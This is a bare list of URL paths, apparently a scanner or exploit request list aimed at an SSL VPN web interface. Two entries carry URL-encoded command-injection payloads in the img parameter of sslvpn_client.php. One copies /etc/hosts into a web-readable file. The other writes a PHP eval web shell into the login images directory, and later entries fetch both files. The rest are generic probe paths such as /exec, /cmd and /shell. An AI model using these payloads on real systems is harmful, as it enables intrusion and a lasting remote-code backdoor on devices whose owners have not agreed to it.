/login
login
/sslvpn/sslvpn_client.php
/sslvpn/sslvpn_client.php?client=logoImg&img={{randstr}}%20%2f%74%6d%70%20%7c%7c%20%63%70%20%2f%65%74%63%2f%68%6f%73%74%73%20%2f%75%73%72%2f%6c%6f%63%61%6c%2f%77%65%62%75%69%2f%77%65%62%75%69%2f%69%6d%61%67%65%73%2f%62%61%73%69%63%2f%6c%6f%67%69%6e%2f%6d%61%69%6e%5f%6c%6f%67%6f%32%31%2e%74%78%74%20%7c%7c%20%6c%73
/webui/images/basic/login/main_logo21.txt
/sslvpn/sslvpn_client.php?client=logoImg&img={{randstr}}%20/tmp%20%7C%7C%20echo%20%27%3CEnabled--%3E%3C%3Fphp%20%40eval%28%24_REQUEST%5B%22pass%22%5D%29%3B%20%3F%3E%20%27%20%3E%20/usr/local/webui/webui/images/basic/login/main_logo_helper.php%20%7C%7C%20ls
/webui/images/basic/login/main_logo_helper.php
/
/search
/admin
/debug
/test
/ping
/exec
/cmd
/system
/shell
/run
/api/exec
/api/cmd
/api/system
/api/shell
/api/run
/config
/settings
/admin/config
/admin/system
/webhook
/callback
